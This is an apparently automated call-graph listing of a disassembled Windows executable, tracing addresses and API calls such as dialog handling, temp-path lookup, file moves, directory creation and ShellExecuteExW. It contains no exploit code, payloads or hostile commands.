25930->25691 25931 7ff65a37ee7a 26660 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 25931->26660 25934 7ff65a37ee80 26661 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 25934->26661 25935 7ff65a35129c 33 API calls 25935->26072 25937 7ff65a37ee86 25942 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25937->25942 25939 7ff65a37ee6e 25940 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25939->25940 25941 7ff65a37ee74 25940->25941 26659 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 25941->26659 25944 7ff65a37ee8c 25942->25944 25946 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25944->25946 25948 7ff65a37ee92 25946->25948 25947 7ff65a37edca 25949 7ff65a37ee52 25947->25949 25951 7ff65a3520b0 33 API calls 25947->25951 25950 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25948->25950 26657 7ff65a351f80 33 API calls 3 library calls 25949->26657 25956 7ff65a37ee98 25950->25956 25954 7ff65a37edf7 25951->25954 25952 7ff65a37ee68 26658 7ff65a352004 33 API calls std::_Xinvalid_argument 25952->26658 25953 7ff65a3513a4 33 API calls 25955 7ff65a37dbba GetTempPathW 25953->25955 26656 7ff65a37ab68 33 API calls 3 library calls 25954->26656 25955->26072 25964 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25956->25964 25957 7ff65a36629c 35 API calls 25957->26072 25962 7ff65a37ee0d 25970 7ff65a351fa0 31 API calls 25962->25970 25974 7ff65a37ee24 BuildCatchObjectHelperInternal 25962->25974 25963 7ff65a352520 SetDlgItemTextW 25963->26072 25967 7ff65a37ee9e 25964->25967 25966 7ff65a38bb0c 43 API calls 25966->26072 25975 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25967->25975 25969 7ff65a37e773 25969->25949 25969->25952 25973 7ff65a382150 33 API calls 25969->25973 25985 7ff65a37e7bb BuildCatchObjectHelperInternal 25969->25985 25970->25974 25971 7ff65a351fa0 31 API calls 25971->25949 25972 7ff65a352034 33 API calls 25972->26072 25973->25985 25974->25971 25977 7ff65a37eea4 25975->25977 25976 7ff65a37a988 33 API calls 25976->26072 25983 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25977->25983 25979 7ff65a37eeec 26664 7ff65a352004 33 API calls std::_Xinvalid_argument 25979->26664 25980 7ff65a351fa0 31 API calls 25980->25947 25981 7ff65a37eef8 26666 7ff65a352004 33 API calls std::_Xinvalid_argument 25981->26666 25982 7ff65a354228 33 API calls 25982->26072 25988 7ff65a37eeaa 25983->25988 25984 7ff65a363ef0 54 API calls 25984->26072 25993 7ff65a3520b0 33 API calls 25985->25993 26028 7ff65a37eb0f 25985->26028 26000 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25988->26000 25989 7ff65a37eef2 26665 7ff65a351f80 33 API calls 3 library calls 25989->26665 25992 7ff65a37eee6 26663 7ff65a351f80 33 API calls 3 library calls 25992->26663 26001 7ff65a37e8e3 25993->26001 25996 7ff65a37ecc0 25996->25981 25996->25989 26016 7ff65a37ecbb BuildCatchObjectHelperInternal 25996->26016 26020 7ff65a382150 33 API calls 25996->26020 25998 7ff65a37ebaa 25998->25979 25998->25992 26002 7ff65a37ebf2 BuildCatchObjectHelperInternal 25998->26002 26012 7ff65a382150 33 API calls 25998->26012 25998->26016 25999 7ff65a352674 31 API calls 25999->26072 26008 7ff65a37eeb0 26000->26008 26010 7ff65a37eee0 26001->26010 26011 7ff65a35129c 33 API calls 26001->26011 26570 7ff65a37f460 26002->26570 26004 7ff65a37d569 GetDlgItem 26013 7ff65a352520 SetDlgItemTextW 26004->26013 26005 7ff65a36dba8 33 API calls 26005->26072 26007 7ff65a379948 31 API calls 26007->26072 26017 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26008->26017 26009 7ff65a363cf4 51 API calls 26009->26072 26662 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 26010->26662 26018 7ff65a37e926 26011->26018 26012->26002 26019 7ff65a37d588 IsDlgButtonChecked 26013->26019 26016->25980 26021 7ff65a37eeb6 26017->26021 26652 7ff65a36d1e8 26018->26652 26019->26072 26020->26016 26025 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26021->26025 26024 7ff65a365b20 53 API calls 26024->26072 26027 7ff65a37eebc 26025->26027 26026 7ff65a37d5bc IsDlgButtonChecked 26026->26072 26033 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26027->26033 26028->25996 26028->25998 26036 7ff65a37eed4 26028->26036 26038 7ff65a37eeda 26028->26038 26030 7ff65a365a68 33 API calls 26030->26072 26037 7ff65a37eec2 26033->26037 26035 7ff65a35129c 33 API calls 26064 7ff65a37e951 26035->26064 26039 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26036->26039 26044 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26037->26044 26043 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26038->26043 26039->26038 26040 7ff65a358d04 33 API calls 26040->26072 26041 7ff65a371344 CompareStringW 26041->26064 26042 7ff65a351744 33 API calls 26042->26072 26043->26010 26046 7ff65a37eec8 26044->26046 26045 7ff65a363268 51 API calls 26045->26072 26049 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26046->26049 26047 7ff65a3657e0 33 API calls 26047->26072 26048 7ff65a35e174 33 API calls 26048->26072 26051 7ff65a37eece 26049->26051 26050 7ff65a35250c SetDlgItemTextW 26050->26072 26055 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26051->26055 26053 7ff65a351150 33 API calls 26053->26072 26055->26036 26057 7ff65a351fa0 31 API calls 26057->26064 26059 7ff65a351fa0 31 API calls 26059->26072 26060 7ff65a37df19 EndDialog 26060->26072 26062 7ff65a36327c 51 API calls 26062->26072 26063 7ff65a36d1e8 33 API calls 26063->26064 26064->26028 26064->26035 26064->26041 26064->26046 26064->26051 26064->26057 26064->26063 26065 7ff65a37daa1 MoveFileW 26066 7ff65a37dad5 MoveFileExW 26065->26066 26067 7ff65a37daf0 26065->26067 26066->26067 26068 7ff65a351fa0 31 API calls 26067->26068 26067->26072 26068->26067 26069 7ff65a3520b0 33 API calls 26069->26072 26070 7ff65a362f18 56 API calls 26070->26072 26072->25925 26072->25928 26072->25931 26072->25934 26072->25935 26072->25937 26072->25939 26072->25941 26072->25944 26072->25947 26072->25948 26072->25953 26072->25956 26072->25957 26072->25963 26072->25966 26072->25967 26072->25969 26072->25972 26072->25976 26072->25977 26072->25982 26072->25984 26072->25988 26072->25999 26072->26005 26072->26007 26072->26008 26072->26009 26072->26021 26072->26024 26072->26026 26072->26027 26072->26030 26072->26037 26072->26040 26072->26042 26072->26045 26072->26047 26072->26048 26072->26050 26072->26053 26072->26059 26072->26060 26072->26062 26072->26065 26072->26069 26072->26070 26569 7ff65a371344 CompareStringW 26072->26569 26608 7ff65a36cf60 35 API calls _invalid_parameter_noinfo_noreturn 26072->26608 26609 7ff65a379534 33 API calls Concurrency::cancel_current_task 26072->26609 26610 7ff65a380604 31 API calls _invalid_parameter_noinfo_noreturn 26072->26610 26611 7ff65a35df5c 47 API calls BuildCatchObjectHelperInternal 26072->26611 26612 7ff65a37a7b4 33 API calls _invalid_parameter_noinfo_noreturn 26072->26612 26613 7ff65a379498 33 API calls 26072->26613 26614 7ff65a37a3c0 116 API calls 2 library calls 26072->26614 26615 7ff65a37ab68 33 API calls 3 library calls 26072->26615 26616 7ff65a367328 33 API calls 2 library calls 26072->26616 26617 7ff65a364048 33 API calls 26072->26617 26618 7ff65a366570 33 API calls 3 library calls 26072->26618 26619 7ff65a36728c 26072->26619 26623 7ff65a36317c 26072->26623 26637 7ff65a363e60 FindClose 26072->26637 26638 7ff65a371374 CompareStringW 26072->26638 26639 7ff65a379c50 47 API calls 26072->26639 26640 7ff65a378758 51 API calls 3 library calls 26072->26640 26641 7ff65a37aad4 33 API calls _handle_error 26072->26641 26642 7ff65a367db4 26072->26642 26650 7ff65a365ac8 CompareStringW 26072->26650 26651 7ff65a367e70 47 API calls 26072->26651 26074 7ff65a37f923 26073->26074 26075 7ff65a3520b0 33 API calls 26074->26075 26076 7ff65a37f939 26075->26076 26077 7ff65a3520b0 33 API calls 26076->26077 26078 7ff65a37f96e 26076->26078 26077->26078 26676 7ff65a35e35c 26078->26676 26080 7ff65a37f9cb 26696 7ff65a35e7b8 26080->26696 26082 7ff65a37f9d6 26083 7ff65a3822a0 _handle_error 8 API calls 26082->26083 26084 7ff65a37bbd2 26083->26084 26084->25707 27793 7ff65a37841c 26086->27793 26089 7ff65a37f437 26091 7ff65a3822a0 _handle_error 8 API calls 26089->26091 26090 7ff65a37f347 GetWindow 26095 7ff65a37f362 26090->26095 26092 7ff65a37be1b 26091->26092 26092->25467 26092->25468 26093 7ff65a37f36e GetClassNameW 27798 7ff65a371344 CompareStringW 26093->27798 26095->26089 26095->26093 26096 7ff65a37f397 GetWindowLongPtrW 26095->26096 26097 7ff65a37f416 GetWindow 26095->26097 26096->26097 26098 7ff65a37f3a9 IsDlgButtonChecked 26096->26098 26097->26089 26097->26095 26098->26097 26099 7ff65a37f3c5 GetObjectW 26098->26099 27799 7ff65a378484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26099->27799 26101 7ff65a37f3e1 27800 7ff65a37844c 26101->27800 27804 7ff65a378d74 16 API calls _handle_error 26101->27804 26104 7ff65a37f3f9 IsDlgButtonChecked DeleteObject 26104->26097 26106 7ff65a36634d 26105->26106 26107 7ff65a3662c0 26105->26107 26106->25482 26108 7ff65a3513a4 33 API calls 26107->26108 26109 7ff65a3662db GetCurrentDirectoryW 26108->26109 26110 7ff65a366301 26109->26110 26111 7ff65a3520b0 33 API calls 26110->26111 26112 7ff65a36630f 26111->26112 26112->26106 26113 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26112->26113 26114 7ff65a366369 26113->26114 26116 7ff65a35252a SetDlgItemTextW 26115->26116 26117 7ff65a352527 26115->26117 26118 7ff65a3be2e0 26116->26118 26117->26116 26119->25493 26121 7ff65a352516 SetDlgItemTextW 26120->26121 26122 7ff65a352513 26120->26122 26122->26121 26125 7ff65a3512d0 26123->26125 26130 7ff65a35139b 26123->26130 26127 7ff65a351396 26125->26127 26128 7ff65a351338 26125->26128 26131 7ff65a3512de BuildCatchObjectHelperInternal 26125->26131 27807 7ff65a351f80 33 API calls 3 library calls 26127->27807 26128->26131 26132 7ff65a382150 33 API calls 26128->26132 27808 7ff65a352004 33 API calls std::_Xinvalid_argument 26130->27808 26131->25528 26132->26131 26133->25561 26135 7ff65a36327c 51 API calls 26134->26135 26136 7ff65a363271 26135->26136 26136->25571 26136->25594 26137->25571 26139 7ff65a3513a4 33 API calls 26138->26139 26140 7ff65a366449 26139->26140 26141 7ff65a36644c GetModuleFileNameW 26140->26141 26144 7ff65a36649c 26140->26144 26142 7ff65a366467 26141->26142 26143 7ff65a36649e 26141->26143 26142->26140 26143->26144 26145 7ff65a35129c 33 API calls 26144->26145 26147 7ff65a3664c6 26145->26147 26146 7ff65a3664fe 26146->25637 26147->26146 26148 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26147->26148 26149 7ff65a366520 26148->26149 26150->25652 26152 7ff65a3520f6 26151->26152 26154 7ff65a3520cb BuildCatchObjectHelperInternal 26151->26154 27809 7ff65a351474 33 API calls 3 library calls 26152->27809 26154->25665 26155->25678 26156->25689 26157->25699 26158->25705 26159->25714 26161 7ff65a3835a0 26160->26161 26161->25718 26162->25633 26164 7ff65a351177 26163->26164 26165 7ff65a352034 33 API calls 26164->26165 26166 7ff65a351185 BuildCatchObjectHelperInternal 26165->26166 26166->25650 26168 7ff65a352085 26167->26168 26170 7ff65a352059 BuildCatchObjectHelperInternal 26167->26170 27810 7ff65a3515b8 33 API calls 3 library calls 26168->27810 26170->25621 26172 7ff65a3822a9 26171->26172 26173 7ff65a37c2d0 26172->26173 26174 7ff65a3824d0 IsProcessorFeaturePresent 26172->26174 26175 7ff65a3824e8 26174->26175 27811 7ff65a3826c4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26175->27811 26177 7ff65a3824fb 27812 7ff65a382490 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26177->27812 27813 7ff65a3877bc 31 API calls 3 library calls 26180->27813 26182 7ff65a38789d 27814 7ff65a3878b4 16 API calls abort 26182->27814 26185->25671 26186->25741 26187->25764 26188->25779 26189->25791 26215 7ff65a363de8 26190->26215 26194 7ff65a36a549 26221 7ff65a3693c8 26194->26221 26195 7ff65a36a4d9 26195->26194 26213 7ff65a36a52a SetDlgItemTextW 26195->26213 26236 7ff65a3697c0 26195->26236 26198 7ff65a36a6b2 GetSystemMetrics GetWindow 26200 7ff65a36a6dd 26198->26200 26201 7ff65a36a7e1 26198->26201 26199 7ff65a36a5c3 26202 7ff65a36a5cc GetWindowLongPtrW 26199->26202 26203 7ff65a36a682 26199->26203 26200->26201 26212 7ff65a36a6fe GetWindowRect 26200->26212 26214 7ff65a36a7c0 GetWindow 26200->26214 26204 7ff65a3822a0 _handle_error 8 API calls 26201->26204 26205 7ff65a3be2c0 26202->26205 26240 7ff65a369568 26203->26240 26209 7ff65a36a7f0 26204->26209 26210 7ff65a36a66a GetWindowRect 26205->26210 26209->25804 26210->26203 26211 7ff65a36a6a5 SetDlgItemTextW 26211->26198 26212->26200 26213->26195 26214->26200 26214->26201 26216 7ff65a363e0d swprintf 26215->26216 26249 7ff65a389e70 26216->26249 26219 7ff65a370ee8 WideCharToMultiByte 26220 7ff65a370f2a 26219->26220 26220->26195 26222 7ff65a369568 47 API calls 26221->26222 26226 7ff65a36940f 26222->26226 26223 7ff65a36951a 26224 7ff65a3822a0 _handle_error 8 API calls 26223->26224 26225 7ff65a36954e GetWindowRect GetClientRect 26224->26225 26225->26198 26225->26199 26226->26223 26227 7ff65a35129c 33 API calls 26226->26227 26228 7ff65a36945c 26227->26228 26229 7ff65a35129c 33 API calls 26228->26229 26235 7ff65a369561 26228->26235 26232 7ff65a3694d4 26229->26232 26230 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26231 7ff65a369567 26230->26231 26232->26223 26233 7ff65a36955c 26232->26233 26234 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26233->26234 26234->26235 26235->26230 26237 7ff65a369829 26236->26237 26238 7ff65a369800 26236->26238 26237->26195 26288 7ff65a38a1f0 31 API calls 2 library calls 26238->26288 26241 7ff65a363de8 swprintf 46 API calls 26240->26241 26242 7ff65a3695ab 26241->26242 26243 7ff65a370ee8 WideCharToMultiByte 26242->26243 26244 7ff65a3695c3 26243->26244 26245 7ff65a3697c0 31 API calls 26244->26245 26246 7ff65a3695db 26245->26246 26247 7ff65a3822a0 _handle_error 8 API calls 26246->26247 26248 7ff65a3695eb 26247->26248 26248->26198 26248->26211 26250 7ff65a389ece 26249->26250 26251 7ff65a389eb6 26249->26251 26250->26251 26253 7ff65a389ed8 26250->26253 26276 7ff65a38d61c 15 API calls _set_errno_from_matherr 26251->26276 26278 7ff65a387e70 35 API calls 2 library calls 26253->26278 26254 7ff65a389ebb 26277 7ff65a387864 31 API calls _invalid_parameter_noinfo 26254->26277 26257 7ff65a389ee9 __scrt_get_show_window_mode 26279 7ff65a387df0 15 API calls _set_errno_from_matherr 26257->26279 26258 7ff65a3822a0 _handle_error 8 API calls 26259 7ff65a363e29 26258->26259 26259->26219 26261 7ff65a389f54 26280 7ff65a388278 46 API calls 3 library calls 26261->26280 26263 7ff65a389f5d 26264 7ff65a389f94 26263->26264 26265 7ff65a389f65 26263->26265 26267 7ff65a389fec 26264->26267 26268 7ff65a38a012 26264->26268 26269 7ff65a389fa3 26264->26269 26272 7ff65a389f9a 26264->26272 26281 7ff65a38d88c 26265->26281 26273 7ff65a38d88c __free_lconv_mon 15 API calls 26267->26273 26268->26267 26270 7ff65a38a01c 26268->26270 26271 7ff65a38d88c __free_lconv_mon 15 API calls 26269->26271 26274 7ff65a38d88c __free_lconv_mon 15 API calls 26270->26274 26275 7ff65a389ec6 26271->26275 26272->26267 26272->26269 26273->26275 26274->26275 26275->26258 26276->26254 26277->26275 26278->26257 26279->26261 26280->26263 26282 7ff65a38d891 RtlRestoreThreadPreferredUILanguages 26281->26282 26286 7ff65a38d8c1 __free_lconv_mon 26281->26286 26283 7ff65a38d8ac 26282->26283 26282->26286 26287 7ff65a38d61c 15 API calls _set_errno_from_matherr 26283->26287 26285 7ff65a38d8b1 GetLastError 26285->26286 26286->26275 26287->26285 26288->26237 26301 7ff65a3513a4 26289->26301 26292 7ff65a352494 26293 7ff65a35129c 33 API calls 26292->26293 26294 7ff65a3524a2 26293->26294 26295 7ff65a3524dd 26294->26295 26298 7ff65a352505 26294->26298 26296 7ff65a3822a0 _handle_error 8 API calls 26295->26296 26297 7ff65a3524f3 26296->26297 26297->25813 26299 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26298->26299 26300 7ff65a35250a 26299->26300 26302 7ff65a35142d GetWindowTextW 26301->26302 26303 7ff65a3513ad 26301->26303 26302->26292 26304 7ff65a35143d 26303->26304 26305 7ff65a3513ce 26303->26305 26321 7ff65a352018 33 API calls std::_Xinvalid_argument 26304->26321 26309 7ff65a3513db __scrt_get_show_window_mode 26305->26309 26311 7ff65a382150 26305->26311 26320 7ff65a35197c 31 API calls _invalid_parameter_noinfo_noreturn 26309->26320 26312 7ff65a38215b 26311->26312 26313 7ff65a382174 26312->26313 26315 7ff65a38217a 26312->26315 26322 7ff65a38bb40 26312->26322 26313->26309 26316 7ff65a382185 26315->26316 26325 7ff65a382efc RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 26315->26325 26326 7ff65a351f80 33 API calls 3 library calls 26316->26326 26319 7ff65a38218b 26320->26302 26327 7ff65a38bb80 26322->26327 26325->26316 26326->26319 26332 7ff65a38f318 EnterCriticalSection 26327->26332 26333->25823 26335->25838 26343 7ff65a3695f8 26336->26343 26339 7ff65a369799 26341 7ff65a3822a0 _handle_error 8 API calls 26339->26341 26340 7ff65a3697c0 31 API calls 26340->26339 26342 7ff65a3697b2 26341->26342 26342->25850 26342->25851 26344 7ff65a3696f0 26343->26344 26345 7ff65a369652 26343->26345 26346 7ff65a3822a0 _handle_error 8 API calls 26344->26346 26347 7ff65a370ee8 WideCharToMultiByte 26345->26347 26349 7ff65a369680 26345->26349 26348 7ff65a369724 26346->26348 26347->26349 26348->26339 26348->26340 26352 7ff65a3696af 26349->26352 26353 7ff65a36aa48 45 API calls 2 library calls 26349->26353 26354 7ff65a38a1f0 31 API calls 2 library calls 26352->26354 26353->26352 26354->26344 26371 7ff65a36d44c 26355->26371 26359 7ff65a36d861 swprintf 26360 7ff65a389e70 swprintf 46 API calls 26359->26360 26368 7ff65a36d8f0 26359->26368 26385 7ff65a359d78 33 API calls 26359->26385 26360->26359 26361 7ff65a36d91f 26363 7ff65a36d993 26361->26363 26366 7ff65a36d9bb 26361->26366 26364 7ff65a3822a0 _handle_error 8 API calls 26363->26364 26365 7ff65a36d9a7 26364->26365 26365->25856 26367 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26366->26367 26369 7ff65a36d9c0 26367->26369 26368->26361 26386 7ff65a359d78 33 API calls 26368->26386 26372 7ff65a36d5e1 26371->26372 26373 7ff65a36d47e 26371->26373 26375 7ff65a36cb3c 26372->26375 26373->26372 26374 7ff65a351744 33 API calls 26373->26374 26374->26373 26376 7ff65a36cb72 26375->26376 26383 7ff65a36cc3c 26375->26383 26379 7ff65a36cbdc 26376->26379 26380 7ff65a36cc37 26376->26380 26382 7ff65a36cb82 26376->26382 26379->26382 26384 7ff65a382150 33 API calls 26379->26384 26387 7ff65a351f80 33 API calls 3 library calls 26380->26387 26382->26359 26388 7ff65a352004 33 API calls std::_Xinvalid_argument 26383->26388 26384->26382 26385->26359 26386->26361 26387->26383 26390 7ff65a37adbc GetMessageW 26389->26390 26391 7ff65a37ae00 GetDlgItem 26389->26391 26392 7ff65a37addb IsDialogMessageW 26390->26392 26393 7ff65a37adea TranslateMessage DispatchMessageW 26390->26393 26391->25859 26391->25862 26392->26391 26392->26393 26393->26391 26396 7ff65a363673 26394->26396 26395 7ff65a3636a0 26414 7ff65a36327c 26395->26414 26396->26395 26397 7ff65a36368c CreateDirectoryW 26396->26397 26397->26395 26399 7ff65a36373d 26397->26399 26403 7ff65a36374d 26399->26403 26501 7ff65a363cf4 26399->26501 26401 7ff65a363751 GetLastError 26401->26403 26405 7ff65a3822a0 _handle_error 8 API calls 26403->26405 26407 7ff65a363779 26405->26407 26407->25873 26408 7ff65a3636fb 26410 7ff65a363734 26408->26410 26411 7ff65a36378e 26408->26411 26409 7ff65a3636e0 CreateDirectoryW 26409->26408 26410->26399 26410->26401 26412 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26411->26412 26413 7ff65a363793 26412->26413 26415 7ff65a3632a7 GetFileAttributesW 26414->26415 26416 7ff65a3632a4 26414->26416 26417 7ff65a3632b8 26415->26417 26424 7ff65a363335 26415->26424 26416->26415 26419 7ff65a3669cc 49 API calls 26417->26419 26418 7ff65a3822a0 _handle_error 8 API calls 26421 7ff65a363349 26418->26421 26420 7ff65a3632df 26419->26420 26422 7ff65a3632fc 26420->26422 26423 7ff65a3632e3 GetFileAttributesW 26420->26423 26421->26401 26428 7ff65a3669cc 26421->26428 26422->26424 26425 7ff65a363359 26422->26425 26423->26422 26424->26418 26426 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26425->26426 26427 7ff65a36335e 26426->26427 26429 7ff65a366a0b 26428->26429 26443 7ff65a366a04 26428->26443 26431 7ff65a35129c 33 API calls 26429->26431 26430 7ff65a3822a0 _handle_error 8 API calls 26432 7ff65a3636dc 26430->26432 26433 7ff65a366a36 26431->26433 26432->26408 26432->26409 26434 7ff65a366c87 26433->26434 26435 7ff65a366a56 26433->26435 26436 7ff65a36629c 35 API calls 26434->26436 26437 7ff65a366a70 26435->26437 26462 7ff65a366b09 26435->26462 26441 7ff65a366ca6 26436->26441 26438 7ff65a36706b 26437->26438 26515 7ff65a35c0a8 33 API calls 2 library calls 26437->26515 26535 7ff65a352004 33 API calls std::_Xinvalid_argument 26438->26535 26440 7ff65a366eaf 26445 7ff65a36708f 26440->26445 26532 7ff65a35c0a8 33 API calls 2 library calls 26440->26532 26441->26440 26446 7ff65a366cdb 26441->26446 26498 7ff65a366b04 26441->26498 26442 7ff65a367071 26452 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26442->26452 26443->26430 26538 7ff65a352004 33 API calls std::_Xinvalid_argument 26445->26538 26451 7ff65a36707d 26446->26451 26518 7ff65a35c0a8 33 API calls 2 library calls 26446->26518 26447 7ff65a367095 26453 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26447->26453 26449 7ff65a366ac3 26463 7ff65a351fa0 31 API calls 26449->26463 26467 7ff65a366ad5 BuildCatchObjectHelperInternal 26449->26467 26536 7ff65a352004 33 API calls std::_Xinvalid_argument 26451->26536 26460 7ff65a367077 26452->26460 26461 7ff65a36709b 26453->26461 26454 7ff65a367066 26459 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26454->26459 26455 7ff65a366f16 26533 7ff65a3511cc 33 API calls BuildCatchObjectHelperInternal 26455->26533 26458 7ff65a351fa0 31 API calls 26458->26498 26459->26438 26470 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26460->26470 26472 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26461->26472 26466 7ff65a35129c 33 API calls 26462->26466 26462->26498 26463->26467 26465 7ff65a367083 26469 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26465->26469 26473 7ff65a366b7e 26466->26473 26467->26458 26468 7ff65a366f29 26534 7ff65a36576c 33 API calls BuildCatchObjectHelperInternal 26468->26534 26475 7ff65a367089 26469->26475 26470->26451 26471 7ff65a351fa0 31 API calls 26483 7ff65a366db5 26471->26483 26477 7ff65a3670a1 26472->26477 26516 7ff65a3657e0 33 API calls 26473->26516 26537 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 26475->26537 26476 7ff65a366d36 BuildCatchObjectHelperInternal 26476->26465 26476->26471 26479 7ff65a366b93 26517 7ff65a35e174 33 API calls 2 library calls 26479->26517 26482 7ff65a351fa0 31 API calls 26485 7ff65a366fac 26482->26485 26487 7ff65a366de1 26483->26487 26519 7ff65a351744 26483->26519 26484 7ff65a366f39 BuildCatchObjectHelperInternal 26484->26461 26484->26482 26486 7ff65a351fa0 31 API calls 26485->26486 26490 7ff65a366fb6 26486->26490 26487->26475 26491 7ff65a35129c 33 API calls 26487->26491 26489 7ff65a351fa0 31 API calls 26493 7ff65a366c2d 26489->26493 26494 7ff65a351fa0 31 API calls 26490->26494 26495 7ff65a366e82 26491->26495 26492 7ff65a366ba9 BuildCatchObjectHelperInternal 26492->26460 26492->26489 26496 7ff65a351fa0 31 API calls 26493->26496 26494->26498 26497 7ff65a352034 33 API calls 26495->26497 26496->26498 26499 7ff65a366e9f 26497->26499 26498->26442 26498->26443 26498->26447 26498->26454 26500 7ff65a351fa0 31 API calls 26499->26500 26500->26498 26502 7ff65a363d1b 26501->26502 26503 7ff65a363d1e SetFileAttributesW 26501->26503 26502->26503 26504 7ff65a363d34 26503->26504 26511 7ff65a363db5 26503->26511 26506 7ff65a3669cc 49 API calls 26504->26506 26505 7ff65a3822a0 _handle_error 8 API calls 26507 7ff65a363dca 26505->26507 26508 7ff65a363d59 26506->26508 26507->26403 26509 7ff65a363d5d SetFileAttributesW 26508->26509 26510 7ff65a363d7c 26508->26510 26509->26510 26510->26511 26512 7ff65a363dda 26510->26512 26511->26505 26513 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26512->26513 26514 7ff65a363ddf 26513->26514 26515->26449 26516->26479 26517->26492 26518->26476 26520 7ff65a3518a1 26519->26520 26523 7ff65a351784 26519->26523 26539 7ff65a352004 33 API calls std::_Xinvalid_argument 26520->26539 26522 7ff65a3518a7 26540 7ff65a351f80 33 API calls 3 library calls 26522->26540 26523->26522 26527 7ff65a382150 33 API calls 26523->26527 26530 7ff65a3517ac BuildCatchObjectHelperInternal 26523->26530 26525 7ff65a3518ad 26541 7ff65a3834cc 31 API calls __std_exception_copy 26525->26541 26527->26530 26528 7ff65a3518d9 26528->26487 26529 7ff65a351859 BuildCatchObjectHelperInternal 26529->26487 26530->26529 26531 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26530->26531 26531->26520 26532->26455 26533->26468 26534->26484 26537->26445 26540->26525 26541->26528 26543 7ff65a35713b 26542->26543 26544 7ff65a357206 26542->26544 26550 7ff65a35714b BuildCatchObjectHelperInternal 26543->26550 26551 7ff65a353f48 33 API calls 2 library calls 26543->26551 26552 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 26544->26552 26547 7ff65a357273 26547->25894 26548 7ff65a35720b 26548->26547 26553 7ff65a35889c 8 API calls BuildCatchObjectHelperInternal 26548->26553 26550->25894 26551->26550 26552->26548 26553->26548 26555 7ff65a3622c3 26554->26555 26556 7ff65a3622af 26554->26556 26555->25917 26556->26555 26557 7ff65a362090 100 API calls 26556->26557 26557->26555 26559 7ff65a3620aa 26558->26559 26561 7ff65a3620c2 26558->26561 26559->26561 26562 7ff65a3620b6 FindCloseChangeNotification 26559->26562 26560 7ff65a3620e6 26560->25917 26561->26560 26564 7ff65a35b554 99 API calls 26561->26564 26562->26561 26564->26560 26566 7ff65a37a9af 26565->26566 26567 7ff65a37a9b6 26565->26567 26566->26072 26567->26566 26568 7ff65a351744 33 API calls 26567->26568 26568->26567 26569->26072 26576 7ff65a37f4a9 __scrt_get_show_window_mode 26570->26576 26585 7ff65a37f7fd 26570->26585 26571 7ff65a351fa0 31 API calls 26572 7ff65a37f81c 26571->26572 26573 7ff65a3822a0 _handle_error 8 API calls 26572->26573 26574 7ff65a37f828 26573->26574 26574->26016 26575 7ff65a37f604 26578 7ff65a35129c 33 API calls 26575->26578 26576->26575 26667 7ff65a371344 CompareStringW 26576->26667 26579 7ff65a37f640 26578->26579 26580 7ff65a363268 51 API calls 26579->26580 26581 7ff65a37f64a 26580->26581 26582 7ff65a351fa0 31 API calls 26581->26582 26586 7ff65a37f655 26582->26586 26583 7ff65a37f6c2 ShellExecuteExW 26584 7ff65a37f7c6 26583->26584 26591 7ff65a37f6d5 26583->26591 26584->26585 26589 7ff65a37f87b 26584->26589 26585->26571 26586->26583 26588 7ff65a35129c 33 API calls 26586->26588 26587 7ff65a37f70e 26669 7ff65a37fda4 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 26587->26669 26592 7ff65a37f697 26588->26592 26594 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26589->26594 26590 7ff65a37f763 CloseHandle 26595 7ff65a37f781 26590->26595 26596 7ff65a37f772 26590->26596 26591->26587 26591->26590 26601 7ff65a37f701 ShowWindow 26591->26601 26668 7ff65a365b20 53 API calls 2 library calls 26592->26668 26599 7ff65a37f880 26594->26599 26595->26584 26605 7ff65a37f7b7 ShowWindow 26595->26605 26670 7ff65a371344 CompareStringW 26596->26670 26598 7ff65a37f6a5 26603 7ff65a351fa0 31 API calls 26598->26603 26601->26587 26602 7ff65a37f726 26602->26590 26606 7ff65a37f734 GetExitCodeProcess 26602->26606 26604 7ff65a37f6af 26603->26604 26604->26583 26605->26584 26606->26590 26607 7ff65a37f747 26606->26607 26607->26590 26608->26072 